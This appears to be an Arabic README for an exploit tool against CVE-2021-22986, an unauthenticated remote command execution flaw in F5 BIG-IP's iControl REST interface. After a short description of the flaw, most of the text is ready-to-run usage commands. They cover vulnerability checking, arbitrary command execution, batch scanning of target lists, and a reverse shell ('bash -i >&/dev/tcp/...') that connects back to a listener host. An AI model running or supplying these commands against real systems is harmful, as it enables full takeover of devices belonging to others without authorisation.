
CVE-2021-22986 و F5 BIG-IP RCE
تسمح هذه الثغرة للمهاجمين غير الموثوقين الذين لديهم وصول شبكي إلى واجهة iControl REST، عبر واجهة إدارة BIG-IP وعناوين IP الذاتية، بتنفيذ أوامر نظام تعسفية، وإنشاء أو حذف الملفات، وتعطيل الخدمات. يمكن استغلال هذه الثغرة فقط من خلال مستوى التحكم ولا يمكن استغلالها من خلال مستوى البيانات. يمكن أن يؤدي الاستغلال إلى اختراق النظام بالكامل. نظام BIG-IP في وضع الجهاز (Appliance mode) معرض أيضًا للخطر.
الاستخدام الأساسي
python3 CVE_2021_22986.py

التحقق من الثغرة
python3 CVE_2021_22986.py -v true -u https://192.168.174.164

تنفيذ الأمر:
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c id

python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c whoami

المسح الدفعي
python3 CVE_2021_22986.py -s true -f check.txt

الصدفة العكسية
python3 CVE_2021_22986.py -r true -u https://192.168.174.164 -c "bash -i >&/dev/tcp/192.168.174.129/8888 0>&1"


python3 newpoc.py https://192.168.174.164

https://support.f5.com/csp/article/K03009991